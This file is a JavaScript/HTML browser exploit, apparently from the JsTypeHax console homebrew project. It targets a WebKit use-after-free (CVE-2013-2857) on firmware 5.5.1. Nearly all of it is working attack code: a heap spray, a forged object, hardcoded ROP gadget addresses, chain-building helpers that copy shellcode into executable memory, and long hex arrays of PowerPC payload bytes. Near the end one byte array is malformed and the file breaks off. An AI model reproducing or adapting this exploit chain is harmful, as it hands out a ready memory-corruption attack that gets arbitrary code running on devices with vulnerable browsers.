JsTypeHax/payload/exploit.html


2017-08-22 21:51:45 +02:00
<!--
Tested on 5.5.1
CVE-2013-2857
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: Bug is present, crash
-->
<script>
function UaF(a)
{
//Warning, the delta was modified !
var delta = 0x00000000; //from 0x0 to 0x04000000 step by 0x01000000
var pivotAdress = 0x010ADDCC;
var pivotAdressAdress = 0x1BB00000; //r6
var payloadAdress = 0x1D000000 + delta;
var codegenAddress = 0x01800000;
var sizeWebCoreImageLoader = 0x18;
var sprayCount = 0x1000;
var _4K = 0x1000;
var _16K = 0x4000;
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
a.type="radio";
//Allocate this new WebCore::ImageLoader over freed WebCore::
var ab = new ArrayBuffer(sizeWebCoreImageLoader);
var dv = new DataView(ab)
/*
0:000:x86> dt webkit!WebCore::ImageLoader
+0x000 __VFN_table : Ptr32
+0x004 m_client : Ptr32 WebCore::ImageLoaderClient
+0x008 m_image : WebCore::CachedResourceHandle<WebCore::CachedImage>
+0x00c m_failedLoadURL : WTF::AtomicString
+0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit
+0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit
+0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit
+0x010 m_imageComplete : Pos 3, 1 Bit
+0x010 m_loadManually : Pos 4, 1 Bit
+0x010 m_elementIsProtected : Pos 5, 1 Bit
*/
//Register:r3 Adress:0x1AF35330-0x1AF35360
dv.setUint32(0x00, 0x00000000); //vtable
dv.setUint32(0x04, pivotAdressAdress); //m_client
dv.setUint32(0x08, pivotAdressAdress); //m_image
dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL
dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent
dv.setUint32(0x14, 0x00000000); //padding
//Rop offset
{
ROP_POPJUMPLR_STACK12 = 0x0101cd24;
ROP_POPJUMPLR_STACK20 = 0x01024d88;
ROP_CALLFUNC = 0x01080274;
ROP_CALLR28_POP_R28_TO_R31 = 0x0107dd70;
ROP_POP_R28R29R30R31 = 0x0101d8d4;
ROP_POP_R27 = 0x0101cb00;
ROP_POP_R24_TO_R31 = 0x010204c8;
ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = 0x010253c0;
ROP_SETR3TOR31_POP_R31 = 0x0101cc10;
ROP_memcpy = 0x01035fc8;
ROP_DCFlushRange = 0x01023f88;
ROP_ICInvalidateRange = 0x010240b0;
ROP_OSSwitchSecCodeGenMode = 0x010376c0;
ROP_OSCodegenCopy = 0x010376d8;
ROP_OSGetCodegenVirtAddrRange = 0x010375c0;
ROP_OSGetCoreId = 0x01024e8c;
ROP_OSGetCurrentThread = 0x01043150;
ROP_OSSetThreadAffinity = 0x010429dc;
ROP_OSYieldThread = 0x010418e4;
ROP_OSFatal = 0x01031618;
ROP_Exit = 0x0101cd80;
ROP_OSScreenFlipBuffersEx = 0x0103afd0;
ROP_OSScreenClearBufferEx = 0x0103b090;
ROP_OSDynLoad_Acquire = 0x0102a3b4;
ROP_OSDynLoad_FindExport = 0x0102b828;
ROP_os_snprintf = 0x0102f160;
}
//Rop helper
{
//Shared state for the chain builder: the DataView currently being written
//and the byte offset of the next word. Both are (re)assigned by the spray
//loop below (ropCurrentDv = ar[i]; ropCurrentOffset = 0x304) before any
//ropgen_* helper runs; calling a helper earlier would dereference null.
var ropCurrentDv = null;
var ropCurrentOffset = 0;
//Append one 32-bit word to the chain at the current cursor and advance it by 4.
//DataView.setUint32 is called without a littleEndian flag, so the word is
//written big-endian (matching the PowerPC target described in the comments).
//Throws RangeError if the cursor runs past the 4K DataView being filled.
//val: 32-bit value (gadget address, register value or padding) to write.
function ropchain_appendu32(val)
{
ropCurrentDv.setUint32(ropCurrentOffset, val);
ropCurrentOffset += 4;
}
//Emit the ROP_POP_R24_TO_R31 gadget followed by the stack words it consumes:
//two zero words, then the eight values that end up in r24..r31 in that order,
//then one trailing zero word. The zero words are presumably frame slots the
//gadget skips over (saved LR / back-chain) — confirm against the gadget's
//disassembly, nothing here shows their meaning.
//r24..r31: values the registers hold after the gadget returns.
function ropgen_pop_r24_to_r31(r24, r25, r26, r27, r28, r29, r30, r31)
{
ropchain_appendu32(ROP_POP_R24_TO_R31);
ropchain_appendu32(0x0);
ropchain_appendu32(0x0);
ropchain_appendu32(r24);
ropchain_appendu32(r25);
ropchain_appendu32(r26);
ropchain_appendu32(r27);
ropchain_appendu32(r28);
ropchain_appendu32(r29);
ropchain_appendu32(r30);
ropchain_appendu32(r31);
ropchain_appendu32(0x0);
}
//Emit a chain fragment that calls funcaddr through the ROP_CALLFUNC gadget.
//Register mapping set up first (see ropgen_pop_r24_to_r31):
//  r24=r6, r25=r5, r26=0, r27=ROP_CALLR28_POP_R28_TO_R31, r28=funcaddr,
//  r29=r3, r30=0, r31=r4.
//How ROP_CALLFUNC moves r29/r31/r25/r24 into the PPC argument registers
//r3..r6 is not visible in this file; the parameter names record the intent.
//The five words after ROP_CALLFUNC are, per the author's annotations, the
//pops of the r27 gadget's return path (r28, r29, r30, r31, pad); `r28` is
//therefore what a following ROP_CALLR28_POP_R28_TO_R31 gadget will call,
//which ropgen_switchto_core1 relies on. 0x0 is passed by callers that do not
//chain a second call.
//funcaddr: address to call.  r3..r6: argument values.  r28: next r28 value.
function ropgen_callfunc(funcaddr, r3, r4, r5, r6, r28)
{
ropgen_pop_r24_to_r31(r6, r5, 0, ROP_CALLR28_POP_R28_TO_R31, funcaddr, r3, 0, r4);
ropchain_appendu32(ROP_CALLFUNC);
ropchain_appendu32(r28);//r28
ropchain_appendu32(0x0);//r29
ropchain_appendu32(0x0);//r30
ropchain_appendu32(0x0);//r31
ropchain_appendu32(0x0);
}
//Emit the fragment that moves the current thread to core 1 (affinity 0x2)
//and yields. Sequence as written:
//  1. ropgen_callfunc(OSGetCurrentThread) with r4=0x2 and r28=OSSetThreadAffinity;
//  2. ROP_CALLR28_POP_R28_TO_R31 invokes r28 — per the author's note this is
//     OSSetThreadAffinity(<thread from step 1>, 0x2) — and pops r28=OSYieldThread;
//  3. a second ROP_CALLR28_POP_R28_TO_R31 invokes OSYieldThread and pops zeros.
//That the return value of step 1 is still in r3 when step 2 runs is an
//assumption carried over from the original comment; it is not checkable here.
//No parameters; writes to the chain via ropchain_appendu32.
function ropgen_switchto_core1()
{
ropgen_callfunc(ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, ROP_OSSetThreadAffinity);//Set r3 to current OSThread* and setup r31 + the r28 value used by the below.
ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);//ROP_OSSetThreadAffinity(<output from the above call>, 0x2);
ropchain_appendu32(ROP_OSYieldThread);//r28
ropchain_appendu32(0x0);//r29
ropchain_appendu32(0x0);//r30
ropchain_appendu32(0x0);//r31
ropchain_appendu32(0x0);
ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);
ropchain_appendu32(0x0);//r28
ropchain_appendu32(0x0);//r29
ropchain_appendu32(0x0);//r30
ropchain_appendu32(0x0);//r31
ropchain_appendu32(0x0);
}
//Emit a call to OSSwitchSecCodeGenMode(flag) with all other arguments zero.
//flag: 0 selects RW- (writable) codegen pages, 1 selects R-X (executable),
//per the author's annotation on the signature line. The two modes are
//mutually exclusive, so the caller must switch back to 1 before jumping in.
function ropgen_OSSwitchSecCodeGenMode(flag)//flag0 == RW- permissions, flag1 == R-X permissions.
{
ropgen_callfunc(ROP_OSSwitchSecCodeGenMode, flag, 0x0, 0x0, 0x0, 0x0);
}
//Emit a call to memcpy(dst, src, size) (r3=dst, r4=src, r5=size, r6=0).
//No length validation happens in the chain; size is trusted as given.
function ropgen_memcpy(dst, src, size)
{
ropgen_callfunc(ROP_memcpy, dst, src, size, 0x0, 0x0);
}
//Emit a call to DCFlushRange(addr, size): writes the data cache back to
//memory for the range so freshly copied bytes are visible to instruction fetch.
function ropgen_DCFlushRange(addr, size)
{
ropgen_callfunc(ROP_DCFlushRange, addr, size, 0x0, 0x0, 0x0);
}
//Emit a call to ICInvalidateRange(addr, size): drops stale instruction-cache
//lines for the range. Used together with DCFlushRange after a code copy.
function ropgen_ICInvalidateRange(addr, size)
{
ropgen_callfunc(ROP_ICInvalidateRange, addr, size, 0x0, 0x0, 0x0);
}
//Emit the five-call sequence that places codebin_size bytes from codebin_addr
//into the codegen region at codegen_addr: make codegen writable (mode 0),
//memcpy, make it executable again (mode 1), then flush the data cache and
//invalidate the instruction cache over the copied range.
//Order matters: the memcpy must sit between the two mode switches, and the
//cache maintenance must follow the copy. Sizes are passed through unchecked
//(the caller notes that _16K overshoots the actual payload length).
//codegen_addr: destination.  codebin_addr: source.  codebin_size: byte count.
function ropgen_copycodebin_to_codegen(codegen_addr, codebin_addr, codebin_size)
{
ropgen_OSSwitchSecCodeGenMode(0);
ropgen_memcpy(codegen_addr, codebin_addr, codebin_size);
ropgen_OSSwitchSecCodeGenMode(1);
ropgen_DCFlushRange(codegen_addr, codebin_size);
ropgen_ICInvalidateRange(codegen_addr, codebin_size);
}
}
//Spray large ArrayBuffer with pivotAdress
//Middle range 0x1B100000
var ar = new Array(0x1800);
for(var i=0; i<0x1800; i++){
ar[i] = new DataView(new ArrayBuffer(_4K));
for(var j=0; j<_4K; j+=4){
ar[i].setUint32(j, 0x10000000+j); //filler
}
ar[i].setUint32(0x204, 0x0);
ar[i].setUint32(0x018, pivotAdressAdress);
ar[i].setUint32(0x000, pivotAdressAdress+0x20);
ar[i].setUint32(0x2BC, pivotAdress); //lwz r0, 0x4(r11) ; mtlr r0 ; mr r1, r11 ; li r3, -0x1 ; blr ;
//r11, new stack location
ar[i].setUint32(0x208, pivotAdressAdress+0x300);
//initialize this Rop Chain
ropCurrentDv = ar[i];
ropCurrentOffset = 0x304;
//start of the Rop Chain
//switch to core1
ropgen_switchto_core1();
//copy to payload to codegen
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K) //16K is too much, but ok
//prepare payload argument
payload_srcaddr = payloadAdress;
ROPHEAP = payload_srcaddr + 0x800000;
ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);//Setup r24..r31 at the time of payload entry. Basically a "paramblk" in the form of registers, since this is the only available way to do this with the ROP-gadgets currently used by this codebase.
//Jump on the payload
ropchain_appendu32(codegenAddress);//Jump to the codegen area where the payload was written.
//Setup the code-loading ROP-chain which can be used by the loader-payload, since the above one isn't usable after execution due to being corrupted.
ropchain_appendu32(0x0);
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K)//16K is too much, but ok
ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);
ropchain_appendu32(codegenAddress);//Jump to the codegen area where the payload was written.
}
//final payload to be executed by the miniloader
//Must be between 1B000000 and 1D000000, this is OK
var finalPayload = new Uint8Array(
[
0x4C, 0x4F, 0x4F, 0x4B, 0x48, 0x45, 0x52, 0x45, //magic
0x00, 0x40, 0x00, 0x00, //size
//binary of hbl code550.bin
0x3c, 0x20, 0x1a, 0xb5, 0x60, 0x21, 0xd1, 0x38, 0x48, 0x00, 0x14, 0x09, 0x38, 0x00, 0x25, 0x00, 0x44, 0x00, 0x00, 0x02, 0x4e, 0x80, 0x00, 0x20, 0x7c, 0x08, 0x02, 0xa6, 0x94, 0x21, 0xff, 0xf0, 0x93, 0xc1, 0x00, 0x04, 0x93, 0xe1, 0x00, 0x08, 0x7c, 0x05, 0x03, 0x78, 0x7c, 0x26, 0x0b, 0x78, 0x38, 0x00, 0x36, 0x00, 0x44, 0x00, 0x00, 0x02, 0x60, 0x00, 0x00, 0x00, 0x7c, 0xa0, 0x2b, 0x78, 0x7c, 0xc1, 0x33, 0x78, 0x83, 0xc1, 0x00, 0x04, 0x83, 0xe1, 0x00, 0x08, 0x38, 0x21, 0x00, 0x10, 0x7c, 0x08, 0x03, 0xa6, 0x4e, 0x80, 0x00, 0x20, 0x7f, 0xd8, 0x82, 0xa6, 0x7f, 0xf9, 0x82, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x00, 0x02, 0x7c, 0x78, 0x83, 0xa6, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x00, 0x32, 0x7c, 0x79, 0x83, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd6, 0x24, 0x3c, 0x80, 0x3c, 0xe0, 0x60, 0x84, 0x30, 0x80, 0x90, 0x83, 0x00, 0x00, 0x3c, 0x80, 0x60, 0xe7, 0x60, 0x84, 0x00, 0x12, 0x90, 0x83, 0x00, 0x04, 0x3c, 0x80, 0x7c, 0xf1, 0x60, 0x84, 0x8b, 0xa6, 0x90, 0x83, 0x00, 0x08, 0x3c, 0x80, 0x3c, 0xe0, 0x60, 0x84, 0x00, 0x80, 0x90, 0x83, 0x00, 0x0c, 0x3c, 0x80, 0x60, 0xe7, 0x60, 0x84, 0x00, 0xff, 0x90, 0x83, 0x00, 0x10, 0x3c, 0x80, 0x7c, 0xf0, 0x60, 0x84, 0x8b, 0xa6, 0x90, 0x83, 0x00, 0x14, 0x3c, 0x80, 0x7c, 0x00, 0x60, 0x84, 0x06, 0xac, 0x90, 0x83, 0x00, 0x18, 0x3c, 0x80, 0x4c, 0x00, 0x60, 0x84, 0x01, 0x2c, 0x90, 0x83, 0x00, 0x1c, 0x3c, 0x80, 0x7c, 0xe8, 0x60, 0x84, 0x02, 0xa6, 0x90, 0x83, 0x00, 0x20, 0x3c, 0x80, 0x48, 0x80, 0x60, 0x84, 0x00, 0x03, 0x90, 0x83, 0x00, 0x24, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd6, 0x20, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd6, 0x40, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x7c, 0x00, 0x04, 0xac, 0x3c, 0x60, 0x30, 0x80, 0x60, 0x63, 0x00, 0x12, 0x7c, 0x71, 0x8b, 0xa6, 0x3c, 0x60, 0x00, 0x80, 0x60, 0x63, 0x00, 0xff, 0x7c, 0x70, 0x8b, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 
0x80, 0x60, 0x00, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x6b, 0x6c, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x6b, 0xf8, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x03, 0xc8, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x03, 0xcc, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd7, 0x0c, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd7, 0x28, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd8, 0x2c, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x00, 0x02, 0x7c, 0x78, 0x83, 0xa6, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x00, 0x32, 0x7c, 0x79, 0x83, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x80, 0x60, 0x00, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x11, 0xc4, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x11, 0xc8, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x7f, 0xd8, 0x83, 0xa6, 0x7f, 0xf9, 0x83, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x4c, 0x00, 0x00, 0x64, 0x7c, 0x08, 0x02, 0xa6, 0x94, 0x21, 0xff, 0xe0, 0x3d, 0x20, 0x01, 0x02, 0x3c, 0xa0, 0x01, 0x80, 0x61, 0x29, 0xb8, 0x28, 0x93, 0xe1, 0x00, 0x1c, 0x90, 0x01, 0x00, 0x24, 0x7c, 0x9f, 0x23, 0x78, 0x38, 0xa5, 0x1c, 0x6c, 0x38, 0x80, 0x00, 0x00, 0x38, 0xc1, 0x00, 0x08, 0x7d, 0x29, 0x03, 0xa6, 0x4e, 0x80, 0x04, 0x21, 0x2f, 0x9f, 0x00, 0x00, 0x41, 0x9e, 0x00, 0x18, 0x81, 0x21, 0x00, 0x08, 0x3b, 0xff, 0xff, 0xff, 0x7d, 0x29, 0x03, 0xa6, 0x4e, 0x80, 0x04, 0x21, 0x4b, 0xff, 
0xff, 0xe8, 0x39, 0x61, 0x00, 0x20, 0x48, 0x00, 0x19, 0x1c,
]
);
//Spray mini loader payload 4K
//Middle range payloadAdress
//Must be between 1D000000 and 1E000000 must be at payloadAdress, this is OK !
var ar2 = new Array(sprayCount*4);
for(var i=0; i<sprayCount*4; i++){
ar2[i] = new Uint8Array(
//from codebin2js.py
[
0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 
0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 
0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x0
0x3c, 0xe0, 0x1b, 0x00, 0x3d, 0x00, 0x1d, 0x00, 0x3d, 0x20, 0x4c, 0x4f, 0x61, 0x29, 0x4f, 0x4b, 0x3d, 0x40, 0x48, 0x45, 0x61, 0x4a, 0x52, 0x45, 0x81, 0x67, 0x00, 0x00, 0x7c, 0x0b, 0x48, 0x00, 0x40, 0x82, 0x00, 0x10, 0x81, 0x67, 0x00, 0x04, 0x7c, 0x0b, 0x50, 0x00, 0x41, 0x82, 0x00, 0x14, 0x38, 0xe7, 0x00, 0x04, 0x7c, 0x07, 0x40, 0x00, 0x40, 0x80, 0x01, 0xc0, 0x4b, 0xff, 0xff, 0xdc, 0x81, 0x67, 0x00, 0x08, 0x38, 0xe7, 0x00, 0x0c, 0x39, 0x40, 0x00, 0x00, 0x91, 0x41, 0x00, 0x00, 0x91, 0x41, 0x00, 0x08, 0x91, 0x41, 0x00, 0x0c, 0x91, 0x41, 0x00, 0x10, 0x91, 0x41, 0x00, 0x14, 0x91, 0x41, 0x00, 0x18, 0x91, 0x41, 0x00, 0x24, 0x91, 0x41, 0x00, 0x28, 0x91, 0x41, 0x00, 0x2c, 0x91, 0x41, 0x00, 0x30, 0x91, 0x41, 0x00, 0x38, 0x91, 0x41, 0x00, 0x3c, 0x91, 0x41, 0x00, 0x40, 0x91, 0x41, 0x00, 0x44, 0x91, 0x41, 0x00, 0x48, 0x91, 0x41, 0x00, 0x50, 0x91, 0x41, 0x00, 0x54, 0x91, 0x41, 0x00, 0x58, 0x91, 0x41, 0x00, 0x60, 0x91, 0x41, 0x00, 0x70, 0x91, 0x41, 0x00, 0x78, 0x91, 0x41, 0x00, 0x80, 0x91, 0x41, 0x00, 0x84, 0x91, 0x41, 0x00, 0x88, 0x91, 0x41, 0x00, 0x8c, 0x91, 0x41, 0x00, 0x90, 0x91, 0x41, 0x00, 0x98, 0x91, 0x41, 0x00, 0x9c, 0x91, 0x41, 0x00, 0xa0, 0x91, 0x41, 0x00, 0xa4, 0x91, 0x41, 0x00, 0xa8, 0x91, 0x41, 0x00, 0xb8, 0x91, 0x41, 0x00, 0xbc, 0x91, 0x41, 0x00, 0xc0, 0x91, 0x41, 0x00, 0xc8, 0x91, 0x41, 0x00, 0xcc, 0x91, 0x41, 0x00, 0xd0, 0x91, 0x41, 0x00, 0xd4, 0x91, 0x41, 0x00, 0xd8, 0x91, 0x41, 0x00, 0xe0, 0x91, 0x41, 0x00, 0xe4, 0x91, 0x41, 0x00, 0xe8, 0x91, 0x41, 0x00, 0xec, 0x91, 0x41, 0x00, 0xf0, 0x91, 0x41, 0x01, 0x00, 0x91, 0x41, 0x01, 0x08, 0x91, 0x41, 0x01, 0x10, 0x91, 0x41, 0x01, 0x14, 0x91, 0x41, 0x01, 0x18, 0x91, 0x41, 0x01, 0x1c, 0x91, 0x41, 0x01, 0x20, 0x91, 0x41, 0x01, 0x28, 0x91, 0x41, 0x01, 0x2c, 0x91, 0x41, 0x01, 0x30, 0x91, 0x41, 0x01, 0x34, 0x91, 0x41, 0x01, 0x38, 0x91, 0x41, 0x01, 0x48, 0x91, 0x41, 0x01, 0x50, 0x91, 0x41, 0x01, 0x58, 0x39, 0x40, 0x00, 0x01, 0x91, 0x41, 0x00, 0xb4, 0x3d, 0x40, 0x01, 0x02, 0x61, 0x4a, 0x04, 0xc8, 0x91, 0x41, 0x00, 0x04, 0x91, 
